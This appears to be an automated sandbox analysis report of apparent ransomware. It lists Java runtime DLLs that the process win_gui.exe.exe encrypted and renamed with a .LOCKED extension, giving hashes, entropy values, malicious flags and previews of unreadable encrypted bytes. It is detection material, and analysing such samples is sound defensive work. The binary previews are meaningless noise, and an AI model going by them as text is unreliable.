                                SHA-512:478C0FF4B48FA09C635993855D1708707951693BE780EEDA792F047B77C7514EB14E546FA9A59B525488D7B1AFFAD7045088B68348ECF2B45CF4677A5FBF0957
                                Malicious:false
                                Preview:0M....z..D[..B..l..v...+;..j..~).*..d.[.|...^..>~J.1..P..gn...'.wv.N....s.O....MD.B=.f.(..G...Y.I...Q.$l...Kr.J..O..<.pl,$..pan..7..1#.n.X7.......`..^...."..s&.K.F.....j.#wx....d.<"'o.@.b^}....?.....X...y@..7?.4...C.n...jN...]....2b8.U70....qa.......u...7V.x..<....v..D?..F..C........z.n]...&I'.)..C7....2.1?|..JP....../ .....u{H8B.e..`..w.........?.5..r....m.U.v.l$.....5Y~.&...*~...Zy...kg0g)B@u.L..zz.f..|..#...4.=......1...G}..."..{.y.~.....,B.j.%3q.nS..|T.zT.g.D.a5o;:X..J...j........./3V..DN.........rY.N$...j.=C..)..a...{.H|_..RNR......s......:E..p..../...5"TA.h..h..../...%..LO.....,f..1...|.D.DO..`.[.8..(.EJu....(u...N.>.$..9.je..xQ.`.@. ..G.>.......#.....~R%D.i.W.....T.R........{....>....-...I.$z8>FqT.t.>.....r<.9.ME-..9...`.C...tq..rk\]%.9......?A........[u.. z3@h....[X..f....dJ.0S.......D..s..tx.gx.r..gH.R.c.>..R..u..gNpm>.O5.......X.u..k.PaA..pR).c..Ws..m.-7$..MNa'.5...}.RD...Ba"..c..0..V.6.Q...w.?[Y.Y..<..z..F..8...K......z.

                                C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12352
                                Entropy (8bit):7.985652231270132
                                Encrypted:false
                                SSDEEP:384:6n36ogLWbrGQ0DXgE0Lvk0/dV4FV3l8Pt+VOj:63eLvVLIg0r4FV3l8Pt/
                                MD5:E834172EC7BBD9CBE88F4FBB1C22A1F7
                                SHA1:639E4E274D0F204B0EFC2DEECF980E64BE64A365
                                SHA-256:969FBBB903626DF64C55F617658FA0114B80056A3AFBB280191F679F2ED2F7D8
                                SHA-512:9B94E30B8B4D3335C2B4CA2C04707CF015321EE1D4FBFE98CA990EE47EE00DCA53C52CC5BE06C11E6F3E63804AB651E0EFBB033949042619804AFC225EB8FCBB
                                Malicious:false
                                Preview:i..z.....Zb..GR~.f!,........Y........}...DWz...2...@..Q}Oh.^EI.9...\l........'z.p..3.....m.5.....h~.>:...MC"..G......%.o.....\...../....y[.7....z!.R>~k*...s :k$.1..?.c..\.8...R...)6..t...U..x.../.5\T.&......Y...{.....!)Z#?..w..!....m.....xs.$t4w....uz.|. \......C.....Kv8.'..a.\.B..>.G/./....a..<....W(m..%ua.+.T.>B....2[v.W..*u.0.E.2Z.p..*.Z.....a...X....Z.H...J...5f.u9d.B`..!.tLps~......'B.|...5....)^....)j>.....|.r)KI.....}qw.a.^..Qpg{..Z.`...9.6(.Xl..L1.E....gY7.......K............p..j@..535h6..@.S&F..OI,{..v...2..es.......J\....M.b.....|...G.^...A.BP........ ..E.&.(^!...0.......bQ..m..p.........QlN.4{G.....{..w'...h&= .2......h...6..tuyd*.Z..6.p3..*..k.*...U.B.u.>...nW..Vyu.....G..m...|..j".....:...u...........q]i.Y#'K.E..D`....%#.`...K.t[.r..9..1F.kP......SGb....B.8a..q...3..|w.}.I.#..\H.F....S..... $....K%E...........e.....X......{c.w...2{(.'.R.g:1o..a.u.......Ew4...?..I......g...E.}.9..$X)T.T.gE8 d.IA}.Z@>...lD

                                C:\Program Files (x86)\java\jre-1.8\bin\awt.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1225440
                                Entropy (8bit):7.110335695382455
                                Encrypted:false
                                SSDEEP:24576:JA0qrzTILfgikyNZ0mZ/VNGqhHfaU4Y0NM+fg5LD6ipY4OxJWf3AIarI8yH5Am:4rxcC4OxJQa2HZ
                                MD5:CC4432342BB0EA9C9984D02C0E18E417
                                SHA1:F0681FE6626C26EF92427561B62C447EB8C4894A
                                SHA-256:73087A4CC8CDE3005550DFB941EB9F10BB61B96AFF81E848538642F442441C4E
                                SHA-512:3065C2B03E1FE7E4C302179665A688053A1C26006997A4B224C015EC473F3FE739D1EA21E231D415E4D03F5CCE0937329E6886332A041F786B0DB757A9937523
                                Malicious:false
                                Preview:....+.m...t....]...l...MK..as.^._w2.<..Z@..~.......b...\..#..}.../.|.q.:3.+w..X..7<.f{..?,...Y......%0x...`.~..{./.*_=......e.Ie.m!K..y...8..:F+cuFF..}...2........@{..MmVP.O..u...".&$...o....:. .."...y.,..b.)&...I.6..>..J.#...N.......P.Z..T..=".......u.^.......R.xu3...,..o.f.Z.....(.Y....$'..g$...2Uqx.G.,..q.3..Z..W..83{fS....z..e..qt.$Q_&a.2...?..no...._.,`>C]......p ..f..[{.uT`.jv,E...o...;H....or.?.bxo........].f...,s.l.....n8......... WY.p..G....P...~..Ze....Feq.BQ/.9.O.[&i...X..Ey.....CiQ..R...-...w..'$._<...`.T....Q2|.|?.s$..*....O.......... Ih.|F#...g..!.[...|..J..ub.^..j.1t.E..U...4.Q/.f:(%.R..:.h.*.In..)"N..$.j.Yy..U]...1..^.........#..........e..+..i.}....).........m...}j.*....1.'{.p.j..L.+dO....c......yiB.prW|.S&.P.;\....".....v.O....ef..i..E...V.y...i^q.....0..L....E*..B..........9....p.......#../'.....M'.D]x..\.FC...IJfJ.:.......6tK}X?9....-T....$~'...>,...0...8PZB.........U..@..........=.;...`...<3.~.g..3....b.K.#.3V.5....><..{..

                                C:\Program Files (x86)\java\jre-1.8\bin\bci.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22240
                                Entropy (8bit):7.9918066412935165
                                Encrypted:true
                                SSDEEP:384:R8RPpKyikMq0g34qtKfSjPTGwx2qS99KbkR7FiQRXrC7eS2Ah+VOg:6PpKyie02UKzThx21/rLTFen2Ahk
                                MD5:4965A7A05326AE1ABCD697DF17EAD004
                                SHA1:F6653735F926634947EB765EDB74058B571F299F
                                SHA-256:519A6D1421C60000E86AEB8A66A6C69BD022BCBBDD6653B6C26F2818FF008274
                                SHA-512:809D383198D910ABD46A4CEB358DEF63D089F4BC0648ABE1261F5FAB2FECE8B776231AD5B41669F327717A5724F1DF69B08AD9520FDBFB7BC2027945CBDC46E7
                                Malicious:true
                                Preview:B.I./..6)$O*S.......DMg.!..o..;.....g...%...`s;@..&..U].,.Tz.k...s.j.V.`'.....|.c.h.A.Ko.3...g.N..,..."....v....g.|;..p...Y..9..%1.......L..pY..I........o.x...N..P^........-...&h.....e...@..U........R.o(.J........g....Eq..J..p...0..w..#1.P.b..>.=.c5.U..M...f.N3xE..;.:.$.....q........-.........b1.:0..... .?...w.c;..fi v#A .b..F...v...=.t.P....M.O..!.Z7.q..~7.g.....x]........g..r..y...t....(.Q.LN.u\.WBP_a}L(.._..+..B..#..{JQk..kt......}..dk...~eW^h7f."..H...vp..+..4:.~...'..g.n....g.e..h...{..Qk...n...+Q.]z.).onH..+.t,.%...8u.a[..........7.F.d.?1...C.}.cc?(.R`N.....{..e....IZ..,ONP..\J...i...v....D"....h.w..N.P.Y...b.....Su..lq(.G.u.d...#..U&...A..<:....\.j...v......X....c....P.bK4bbWX.)m.n..n..5...C.o......R.|..y. T....;./...Gmm.f....b 8@.,.....?7.+.e..%........*e.uX.h.;.4vS.Q0..9.D...[..)..LK...{.......O.:Vr j. .(c.....a@a?}c._3G.f.$=.|.G...*.4..Y..B>U._t.....1d...7...?.v.6$L`W|.v)~.x..A.)..H.=....A.[]....rU'..(D..F

                                C:\Program Files (x86)\java\jre-1.8\bin\dcpr.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):152288
                                Entropy (8bit):7.999000054378898
                                Encrypted:true
                                SSDEEP:3072:CB3fqO7ZrbcGHeYurqjPhvwz/DeazV4FXxpSvh8ri8b0OFf+E/xRXrMphmF:CVjnpX6qbhvGbeahC4vh8jf+EJNrImF
                                MD5:B0D2F4C3E7433B02763CACF14555AC37
                                SHA1:6E7A2F74B67939295C2CBD6E5EFB75CE40D8850C
                                SHA-256:2FE6D9553D5D547CFFEF7B897E4742F23438E7A4BA3B5178BF6071EB004D0FAA
                                SHA-512:244F94E20AEBC5ECC4452127B76167BB8332B7CB40F04CBBC33D5D69C5D327DFEB2B031B81530C679BACDC189A0BE66E84DBDE540F1D55CE54856201CB55D804
                                Malicious:true
                                Preview:.O._F.]@...o.jf|._g0....9...._5.aP.Y./.KHdq..>..B.....j...G d....VMq.0..Sf.DZk(=.......+.`..".%....m..B......`../W..O.....@........bWS...5VL..N..v.A."...^e..B_...`.1.....q...f....&MXr.d.o....r...e. ..A.,WY#.%..A/L...7...v.1=.H.t.nP.S...,...?.SUpO.TP.vj...J.VHZJ.CT........`...-z.;:.....&?.G.o.b.{#....;$x.......i.uGv.....t.b..!....:...a.]{.o.I...j7..v.=..(x.mh.$..=.^._....V...'.....H*.nZ..G.fv..W...........2..q..0..:..q...y...+R....Ng.5s....0>.GO.\.38.U..i,...r...........<G.^.y..P ........s..."F....5...y. tuo.X.O.9%....`.a.nV..R.?JM.......e/q...%....4...s1.`?.4a.N..H..svh.v....DC+.T w.$.=.a..=.%...l..K8a.....s.WA...V.e.sY.o..u_...a..*F.......~mRH...m../.W...._.?...@..|A0+M.[....`>t#....F..z!....y.2.lA....H.........K....q).U..f....ve.>0........^.$.a.Sa.n..z.......n...i./.V.......H...,....*n.1..:-"K,nS.T..r|..q....6.uq........._.u....92N....%...>.v.,.I.[c.....".`.R.(.$VM..5"x].7.L.~(.m...^.}.]2S.T.......%....8.G.O..%...g.,..p...Q.c..e.7]..X.C>

                                C:\Program Files (x86)\java\jre-1.8\bin\decora_sse.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69344
                                Entropy (8bit):7.99729730135454
                                Encrypted:true
                                SSDEEP:1536:8JQikin9kIVdO+K/BaJPnLJx37JefPJ9jTHMtNMnMu+clnMNhBt3:Rin9kIV0+0ALX3Ifh9jDMtWJ/Mfv3
                                MD5:D7A09623574E8DCF2812B319BB86FBE5
                                SHA1:EC4F1C38584EF40D62A132E366362186B61B846E
                                SHA-256:01637B95E9F001AF2B664DC85307DDA1B208C33FA43DE698C1C783F490372030
                                SHA-512:3CAB907A1F9D3D13CD10A0F901D81A291475261B7C50208A4FEB475C6691BC755322B34C9150BC4E242ACDAED31B3B86987556176209B4B8725B547BD28254DF
                                Malicious:true
                                Preview:.....L.R.....".{.?....h..R+.A...=..z..Ak......A.,!:#.....u....I../.....~w.+..M...j....../`...<.r.0....5..-.E?p..k5...<.]iL.w<...cEK.~.I.^Qa.on.......$....~[...(}m.;....*.o......C..f......~p..\..,..3..1._..QU.z:b^.... vB.71.YO..e&/..\.*}.&...{.\.S<.S2...M..E.d..-*.s.]0r...R-....M.c.iBh........U........>...cU.'T....8...e..{..x7.:..s.'H.Tv.dX.i#.I:#.}...M2.%GQ..H.l..4I..kh......'?m:..m.......L~W...2.D...J\.-k.g.c........"d..i....{.t...].[.....9..u....<t....\3.....U.:.@)|..2?....GPt.m....^..JT..).`.d......u....AG...^e....._b.U.....;...."(.kc..8.s6....}.62?(,..kh........E..m8..J=..L...TN.vF.......6....!4...w...XC...~..L$.Q...T..A....69...8.L...].o..A..G^...u"m.16.f...`B.*......B .gng2b..[_.Jb.M.Bx....8C|..3...JD.T..>L.ePd.^...`..Fy&.P...=5..CR..ODXtc,...._o.j.2[.O.".y........;..G..B.o.R7B.2......!...+.N..Q.h.1.-....{.&.>*.$.4n.*...hsY.mQK9....o>1..m...D.>..l...f.....f.'..t.....D~Zeeiv.u..b`{5g.......b.X.R..u...m[...C`.m......z..2..C.Ij..m..%.

                                C:\Program Files (x86)\java\jre-1.8\bin\deploy.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):448736
                                Entropy (8bit):7.742703452746421
                                Encrypted:false
                                SSDEEP:6144:D8vdlobcx94J45VGTCPqAKaVJ9/tCOjfjFLX1Luu4JUfHtMUj955JNtdgC+nlKG:DhbcxG6rPqgJ9BRtBGQFtdgjlr
                                MD5:208C15112222EA11D01738CCAB047058
                                SHA1:6DB8EB73CB54153A0F10EA58418B5FAA4CA1443A
                                SHA-256:8E61BD39CD5724A3F34018910CE2535FB6B5A115C49B6690AE12365550A03FA8
                                SHA-512:4E3A4638B45CB25B9B786378C1903D02A50B1AAC78C7BF70AAC0816C44C75EA335B37E42E63534DE85249F3D00261AD1B6C3E8A9E7A6797980F7E8840C913B87
                                Malicious:false
                                Preview:.....@..U.(o.S.s..y...;.i...O'.= ...*tq...@.(hn.v.....a7."mH[.avq..$.<.<..X.....D..5...f.....W...y..../K..L..|......u...M~D:#+..2.z............~.`O)...j.J......_#.85.<...o..2^...1vx...U.&.p`yR]......d.8.E.6...q...[.p.r..J_[u/.q~.c.+...29.P..|J9.H...a.A...c......hY4.Q....wt...r\p..l..F#{+...........O...R+.a.kn......Vi.<.d}......y.I....%..".R...M.9..h.;w.. nT4....@.. u.S.......4.....Q.3...V...2..9.>8..N|m.x......#.}..v.._.....v..[C.xZ.ct.+.%jxX*.)..>..%#P|..v...L..K...p..S....N`.E..hz.g..oc.....wh#.5`..la......t.l.....[....l-.+.Kg.._b..J...U.<F...-[..@z;st..,;...=...U....!.5/.d..9....~.[.Q`u><.F....".F............Y.fZV..r...J4.^8.......H...k...B!W..`.^.....6.N[Y.I...s..Q...>..Ph..5m.........4.....e.P..:VU.r.@i.S.....>.c.F.o.....|g.?o......&~$....1.9@.0.N1]Ey....U..P/.%{L_.XA.b....`...4W.t...T_..8..<.........]pCdk.....@6.g.N.\.......Z.+^`.......8..p..i..._2/g~ZN7..e.....M....fey..;.b.........m.XY@.g..F.{MV`V....B..~.........

                                C:\Program Files (x86)\java\jre-1.8\bin\dt_shmem.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):32480
                                Entropy (8bit):7.993860741449151
                                Encrypted:true
                                SSDEEP:768:ybqdogMeodfu87d87VaNbTXJmbmbmcLscyLwBrDNKk:PdogroZu87dGauybAG
                                MD5:9F4EFE8BAD680F19868B775ABEC37AE2
                                SHA1:E34B7AFAD8E19CE1821FD4EA333F76450C34401E
                                SHA-256:65F8E5926EF9A99B5846349BD2B933787E73A6F1A1558CC26CD7D52813A1F975
                                SHA-512:834120B3133C4FC9C765A2F19CA2C0281EE9B2449E7A83AA3B7FE3E4CC9E2F81DAF29953178D633451E723D2BADAE33C62ADCABAA862FE0E35234CAA7CFF48BF
                                Malicious:true
                                Preview:.S...".....F2.v.k.aYD./.+......c..;Z0\lv.u.[Y.....\q0....^O.EW....t.].?.31.VT.I...r..1cR.."7.v.........3..k.sU...u...._.....#w..E..f.i#. s..[.P.....<......u 8...-.1.o...d...].xo.`....J SK....W.Or\..<.f>.w..G.....f..z.].|.z....t..V.k.9..O..7a.....y...z.U .-..I`p.L..B.z.[.l..Y.M.2.q ..oC.z..V/~m...)..%...+...]YB..4.y.....6.t...1~g.......Gm..V.1..,.V,|. .kSC.e...)(p......r)..fA..<..f......57'...mw..N.O..k.R`;.....X!.{.........WBO..TZ.xxq..u;.`.9.d..Z....cp......^...t..<.D0..U....&....4..6+H......\...f.3{...N..6.H^...:R_.?......U...{?x7!g~L.,.b..D...~.k.......M........"....=.r.e&+d<.....g...t...D.n./._|.%W..> f.........../.#.g...w.:.N..W..&.VH..Q..d%....kc...+.-..8..`...G.hy.....`.6:H.......M4..<.....7._....A{....F...cR......X......7..cyr......O0c0..4\..z.wa.U.I(....e..f...%_....vC%....SGH."..7>....4.F9am...u....L6Y...=.7.....x...TbL...........B..[..].....je....$........].E&F.'F..9.&!......$$...........%8......CS..;....J.>j....H.c.$]...

                                C:\Program Files (x86)\java\jre-1.8\bin\dt_socket.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29408
                                Entropy (8bit):7.9934654335168265
                                Encrypted:true
                                SSDEEP:768:5TJLgkdt3Wv9Ds1tDt/RsCu77RiEtcJmiGNIK1EnmlN+y+UH:Pn/W1Ds1PaP/gEQmiAEnmlN+H+
                                MD5:D48E9C2D736F162D5B0A5B333DBE43B0
                                SHA1:E1C9955A57DC4664DA2F31F51A05D905B4A1D8CD
                                SHA-256:2DD3769FF99BC204A1BDE905067F8571473148E4B138B2B3392AD555D2ADEF06
                                SHA-512:A02D82AE9D5D6FB3C144742A8635E2DDF3338880B2596F28CCE682989155DD76741B9CE0AC4419CEDC74ED07E8587F573AF1B9F485D77F8F40F4E20D40E21FA3
                                Malicious:true
                                Preview:]\..... ..?Ri8..V...S.)v......QL.+..2o....5-........G......CF....fA.j..X..R..0..XrK..~+....5.....O..L.5y..;.}..+\.Ow..`.....fe..l>....e.Fm..w..&.x7;.=0zx:Z.3..)P....$.&..s...w1/N. /..........L{...;/7...|....J..e;.....^..........}...Ii.c.,.k~.xG........Wq....."u=........vH....&.[....:.'Sh..9..u.:.oT... ...0....,Qs.i.U{.......d-.....La...<...;%..+..$..B..A..`.4|..+.&. .....$.m*~rZ....c{ h.*$......D....V..A...s...y...?F.....=..1.^.D.....:X....'....'l.T;..a.7.._?......w.....D........T...4.O..(..X.G.QGTT.......6...."i...-{....V...r#....YKP....>~...../.....496....D{...^......].?..>j@%........u-......g.Bm.O.......!....x.GgR..}A=...`.K6}T..Zx..2s.....'.h"xj`G..0......X._.m....^....!..{.D....h.d...~.u.C..D..Q.<4l^_.9x.........%....A....... ..F..r...Q....T4./.(..<.qzG....'.....,..9.n...8.Q.......|W&.....8....5D.) ..<.r.5....L'!:..!.t..RC5.G..J........DU.}...rn,.......{p.h.'#..\w..6>-..Z./#..6K,s .y.b..;;.&"...6..,7........h..<..q..8.iy#.h.pB....{.

                                C:\Program Files (x86)\java\jre-1.8\bin\eula.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):138976
                                Entropy (8bit):7.998712340519312
                                Encrypted:true
                                SSDEEP:3072:6jYg+qNzMnkwlWmqu1/YAQX5/0l3OIg7qdRzpN:/g+qNzMnkwlWkU1zOd/N
                                MD5:2D5F56DA2A52A98F94FCD3DF5195C5C7
                                SHA1:21EB2E8D805BA1B96086C21E5D9161EBE8E94836
                                SHA-256:7B9B9B15DBFDC71853E8E18D78E749A33E0F9311319F5F1D965171CCA451D996
                                SHA-512:A9D5F926098F5060B8B973FE6463961FE5A2342C66756DC1F9C784DBEEE071A5146516C5CE5D465FDAFDB3E06EAB790414332E2F503D6E6C2D5EEA530967DA49
                                Malicious:true
                                Preview:.:fhJ.UJ.7....js9X]..(...{.t....d.xy}..l..|.3.}C+.../.v......;Pu..)b...4..b.D.>Q..|....{c..l.},....A..T.....|. m.#....Vt@..Y`..-./..s..f...Y........cW.RW.....m.+...b.+....n........V....)o.a.aK7.S...h}.G.:E7..F.R.Q.%. IW|..$8..}..M.wU.R.'....(.h.y...5..H..R.4U.u.....|.....L..<.u3.gF....9.V.6.Q5...a..}.4.....y.......^...W.q..4...M.bA......#o.K...{.:.u2../..<t..G.S..7.}.....$C.JL.. ......u....h._.~QHg...s. ...BR..,.....@.A.L..~`=]..~.......a.(...R.%;...... .>.......l_....#..O%.yQ.s....3....(.&Ngt"I.0.S..]..P..i#ex.;.:..h..?.....d.....,..|.....`{l...........T..........0y.>.F.$.......+q/..G...wJ.3..K).%j......].......96U.&.7c.nh0.`C.r..........B..x=..f......].'....I...YN.:.A..Fg".8.........\..R.......eE.1..k......b..Jy.`..K...z..B|s.H$_...{\....2ka...........5.W.F7p...=[..,.W8...N......m..K..`.%....>.....r...B.xF.^{d..C.U...[.....J.eE.k...I.j.x.... 6....d....r.S.G.#..}.I.`..J.b...<3v..;.+.3%..@..*]@K..F.C....4.h.c.sn!.{.......~X..&.VN.

                                C:\Program Files (x86)\java\jre-1.8\bin\fontmanager.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):265952
                                Entropy (8bit):7.999292482950315
                                Encrypted:true
                                SSDEEP:6144:kUSxlO77ke1gUcxOH61opWEBnOyvGDwfnIUw6LB:nSLe7kJCaqBnOyvBfPLB
                                MD5:C760023C8A9C190D35CE5E421C7794DA
                                SHA1:8384DBD108C4FBDF9C1355082330D169858B6582
                                SHA-256:9DC06096D11AE9226CC66821ECDAA1A320B4723F8FF2789743DD40F03C41E51C
                                SHA-512:6FCBA8CF26C9C848E50F17F4C261786634878CA4175FE976860354F588066F99005453F05976E6DA8CA801C4C9AA630584456779F2DCF89152BE8FEA13C3D311
                                Malicious:true
                                Preview:t.....C.....GVK^..XIH.c#.Qp.K.....q.}......!.D....,.D.....@..........X..rO.R.......'...x ...........n^N..%......Pa.~.T...%do.8..}.k...u.8.*.gX./. bl.O&z...]..D......p~.g....b.;.G...(8.QAR{...}.)....>X..B..;....o`.6.P=4b.U...?...{...}l....,..")...p@.s..!..J...C.T.OZ..E'.R%.J.'....Q.<.,H.y.4.WW..'...}w;<.D..j......?....F..-...../.k..<F+.........:..#.&=...fd...Y........s.1&.VB)...+.u.._.{......z2.e..fh..TPhQ.......Y.2.y...p....+s..K..j>...^..."...._....~...Y..7.4B./.....oll%.:......G.k..D.h/......3......l^.>......C..Q ...&..B.....k.y.@.-....J'.%.H..A..>=....4K.h..*w..\T.X8...N.}.4)....W..."...-..g....(.d..k.Z..)..,=.s.td.$...).r.6l........W."GDt.A6.Eu<........l.`..tq.I...vDF.;.e....uEp....b...L=..B.m.'.3..DVx...~..B.f_.&'[y.d..[.JR...W.4w6. .W....E_.o.c.>P[%....Vs...n..;.l..M.L.....gW...vj..x.2..H].......=?=.9..oa...6....t&..~.aM...=.64. ......#..a..fE.'{:.........:......Z........+*.=...3\.,pG.|P.^.e*.bu.......%..Y0....4.s9.....=.

                                C:\Program Files (x86)\java\jre-1.8\bin\fxplugins.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):158432
                                Entropy (8bit):7.998802284391687
                                Encrypted:true
                                SSDEEP:3072:Wu8O7fs3U3OB9jX9fmiYXsHRghDD4UE2ysKbuxcpXcuKmBGF:W9OIUeB9jX9f2XsHorE2QbuxcpMKu
                                MD5:45619959E2E026C06BF53DB08B48E46C
                                SHA1:E94A17C21C9AAB11C8043772688F579D5AFCAAEE
                                SHA-256:EACC041FB222BD19E613388B9B37B5F70B1D05F98E56AFB92EFAE8B09A18B0F0
                                SHA-512:D69A7F225071EF061FF99024AF0D642A67D40F3964143700E9B41D8036D30C90F45B098B2E3977BA2A0D2218626B8D7B7F8DDA279A63E42C07ECFD1AF743DD8B
                                Malicious:true
                                Preview::...45p...&...C]....}'..7&X..1./..a.........'.j.E.........W..M.R+.e.@..]...G..D>.2#...].....z..G..-.V.......tU..#...C...g..K)M.yv\.X.../.@..7'i&E.@. .... B]..v18.:.sL.m..?U.."7U?I.l'Os.....,...l..1.M.:.@Z..ZM8#...Q...<..?.ua.l.".-..6U..Q......6..C.>.....C....q.N......4.>S(ZS{{.5.y@d6x%4...3..&.s..=s.i.....:..2......d.cE7.W....D.H.......H....{....&C[........$C.+.$...R.1B....].?.D.Y..9N....Rr.(..G.Y..b...<...TI....7b.DK=.G....M.N.O=...$A.X*...`....i..0....W0.....'...k..F.Z..%.....QK.r.....KE._..>z...,....^.....w..A9J8...|o?xE..M8...y..E....E{i.....E.Ei.rb.....y.L..!(.g@..fo.P.+....V.....~.(.`Im+.....~...M.i.$J..1...@....L...|....-..`...Ft.S.o...e...W ..&.B.7.I..<.`.,..6jV2.N.&2h}....../.`.S.....c.`".....A.......T..."........y.(.I.2.C..C...Y.r[<.{...E...U...^.....s}..>.Wr....Cd....o.(3...g.x#&.....Ns..%.n....uq..].@@......9b....[.........eb.(..4)../Z...S....@..06.46.......3..2O.w.y7..%.F..._.2......S.V...Jm.7.?s.}?L..{$.a.r...=..?D..r;..2.<\.

                                C:\Program Files (x86)\java\jre-1.8\bin\glass.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):222944
                                Entropy (8bit):7.999122844470482
                                Encrypted:true
                                SSDEEP:6144:V3xaJZo/SAnCedPlX+jfJsnrst0QbcBOX8TOkfIoEpDsn:V3x3/SALdPMfKu5bcBBbBEl+
                                MD5:F6875B13E6C2E4B8C9B997E253732419
                                SHA1:8BA9D4F4625A1C302C1BB74A202554B29078E2AC
                                SHA-256:8BCE89FD3205C0520E47ACBD171E0277D0CE1547CEEF3BD020E3A881039954A1
                                SHA-512:E736CC4AB9F64356C06C6B03BA25279695378E2F3818F438DD280D8FD3419C0A99AAA9E25F69C77B1F227246A8205B40AFFDEDAA8D8445B43B4E18DF0E6FF7F3
                                Malicious:true
                                Preview:.\`_..........}~....u.%..Q..Mz.X..O8....N6&7ON....|Wlg...3.....6.j{q/.4o........G...I..gA........d=<.\R.9...<..e}..l..U..,P.(..n.=c._.8f.5.m...u.Y~ ..............u.I&....hN.@.0.^.~5.h....B'.B....].H..F%.&/.3..{..6J..1.m.D..C..uj.X.(-.P.....p.=."...'.P.0..|p.f...|m/V..W..c(O.h..E........f.pu....0o.pL7.....~..........:#.c.....k]......8..'+}.....!.5..H..(;.................b.QVA....Z......./.TN..Lr...;7sI....i.c.....YB`P.....L."A.............k.qc.O._...U{..e.=:Y...=..[....,.2.j...R..9b.<.`.._v^z....q._z....U,B....i..d.u....._.z"i#.9+~....cg.._~......w...P).=wR..k.P.$F....T....n.G..k..$]...J..*dK.q<....;........q..J.O.c..<&:...C...1.......\0o.{1.[.u....S..o:-..../..kG.s..}...p.t.)o.....s...*..k6..v?.yg.e[%1.....^%..BA*%...&.r.}/<..J2`..+....J+&.z..`h.jJ@.t.DsI.Cm+.j........V..JL..;...G......a...*&!.W&.....\.......:...j..[6<.w7.{.1.H.6.....~.,..n2z..k.Q.3..L...UAz/...|`..>b..Zis...`...r...."..... ..'.T....P..a7.vg...#.....{...BE/b..N7O.

                                C:\Program Files (x86)\java\jre-1.8\bin\glib-lite.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):567520
                                Entropy (8bit):7.227920723668874
                                Encrypted:false
                                SSDEEP:12288:guxkVWawfs0Qp8Juzl6GxZGwviVuedvfEnIjiHGZY4:gWkVuk0QpQuzl6MZIYed8siHGh
                                MD5:B0DC94C4ED5BC78995EECB3E1A78906C
                                SHA1:BBCDCEBA1FBE346672BD129024107E6829EE97B8
                                SHA-256:41AA3325E8332C933BB2941BE7D868BD666C353F846E3F29969344ECAB987C44
                                SHA-512:01BE4D23C976DDA3A18AEF0AC8B6482DE1C57087C1BDA8528D35C2C734FF2E3800729167B45625A7875CE9CEDA504FC51C6B3F0AB90E7511A42C52483A53BD1C
                                Malicious:false
                                Preview:j...W....C....d..\;{.x..4....'..=.'...#LPT{Ir.I..' ...5.Oe...I..W!..........,.z.p..$...K....m... '...l.\+...mtb.K#u...C.a..}k.R\u..]%n...D.....C]m.|..............5V).%......5..h0D......j......B.....}\c%..(..y............fZ....T...#...)........j.k>.....OWN&H`....D..+0.!...$EO.(.l.l=4..v...p.....d..........>!UM..<(^C.....N'..l....y...i.Q..?..c..?.JhE&d.W........t.t.........{.;..x.o.U.:.S.&>.f......].....$.;l.....8..B&..f...B....D~..Yxc...U....o.x....\...ow..qF...T.h..'...D..........V.b.P....2.%...Lq...bM..m}P..7.it..2H...2.RO4..[..P.F..C...]..7N..jU..Z.B....<6A....m.m../(?.....U^yw.......ur/.Z.g...$L..m.3..(.(..'.wG^4I...H..r.^6..s$:}..N ...!.0....k}t......[...Z.......Mn..v...1...eg60=.1...3.+"v~..j.jD..+?...GRD.*m....F&.c...h*.n%.......R.....!nhCS.....#...rN>ivo<v.[...r2..5"o..-....t...VO....M....T..6n...G...u.6....|>....I.8I........#D;.......:......i.. m..p@:4.....7..W......... .\...&'d..CI..hZ:.{....&.Yd.....,.....Hc....

                                C:\Program Files (x86)\java\jre-1.8\bin\gstreamer-lite.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
